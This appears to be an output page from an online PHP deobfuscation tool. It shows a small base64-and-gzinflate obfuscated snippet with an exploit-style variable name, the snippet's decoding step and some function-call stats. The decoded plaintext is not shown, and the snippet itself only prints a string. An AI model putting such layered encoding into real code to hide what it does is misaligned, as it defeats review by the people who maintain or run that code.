Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<? $UeXploiT = "Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1KBrNK85PzcgqLU4mLqCCclF..

Decoded Output download

<?  $UeXploiT = "Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1KBrNK85PzcgqLU4mLqCCclFqeamcSnpCbnp6RqAO0sSi3TUHHMM8iLN64IyMnPDEkN0kQC1gA=";  
print_r(htmlspecialchars_decode(gzinflate(base64_decode($UeXploiT)))); ?>

Did this file decode correctly?

Original Code

<?  $UeXploiT = "Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1KBrNK85PzcgqLU4mLqCCclFqeamcSnpCbnp6RqAO0sSi3TUHHMM8iLN64IyMnPDEkN0kQC1gA="; 
print_r(htmlspecialchars_decode(gzinflate(base64_decode($UeXploiT)))); ?>

Function Calls

gzinflate 1
base64_decode 1
htmlspecialchars_decode 1

Variables

$UeXploiT Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1KBrNK85Pzc..

Stats

MD5 c650d59504984cb0c5abce6219259e4f
Eval Count 0
Decode Time 41 ms